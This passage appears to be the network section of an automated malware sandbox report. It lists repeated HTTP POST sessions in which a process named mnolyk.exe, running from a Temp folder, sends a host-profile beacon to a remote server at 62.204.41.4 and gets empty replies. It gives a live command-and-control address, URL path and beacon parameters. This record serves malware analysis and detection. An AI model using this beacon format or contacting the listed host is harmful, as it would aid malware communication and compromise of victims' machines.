Feb 7, 2023 19:57:13.008119106 CET	157	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:13.072851896 CET	157	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
290	192.168.2.5	50000	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:27.513822079 CET	509	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:27.578027010 CET	510	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
291	192.168.2.5	50001	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:27.747122049 CET	510	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:27.812407970 CET	511	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
292	192.168.2.5	50002	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:27.980529070 CET	511	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:28.043360949 CET	512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
293	192.168.2.5	50003	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:28.269253016 CET	512	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:28.335577965 CET	513	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
294	192.168.2.5	50004	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:28.516742945 CET	513	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:28.581959963 CET	514	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
295	192.168.2.5	50005	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:28.753873110 CET	514	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:28.819713116 CET	515	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
296	192.168.2.5	50006	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:29.008274078 CET	515	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:29.073539019 CET	516	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
297	192.168.2.5	50007	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:29.284925938 CET	516	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:29.352976084 CET	517	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
298	192.168.2.5	50008	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:29.531822920 CET	517	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:29.594883919 CET	518	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
299	192.168.2.5	50009	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:29.797002077 CET	518	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:29.861598015 CET	519	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49700	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:04.269931078 CET	98	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:04.333868980 CET	99	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.5	49730	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:13.243832111 CET	158	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:13.308459997 CET	158	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
300	192.168.2.5	50010	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:30.047945976 CET	519	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:30.113293886 CET	520	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
301	192.168.2.5	50011	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:30.290364027 CET	520	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:30.354994059 CET	521	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
302	192.168.2.5	50012	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:30.553987026 CET	521	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:30.620116949 CET	522	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
303	192.168.2.5	50013	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:30.820174932 CET	522	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:30.884478092 CET	523	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
304	192.168.2.5	50014	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:31.062716961 CET	523	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:31.127194881 CET	524	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
305	192.168.2.5	50015	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:31.307259083 CET	524	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:31.373688936 CET	525	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
306	192.168.2.5	50016	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:31.545049906 CET	525	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:31.610845089 CET	526	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
307	192.168.2.5	50017	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:31.793987036 CET	526	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:31.859750986 CET	527	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
308	192.168.2.5	50018	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:32.051728010 CET	527	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:32.118958950 CET	528	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
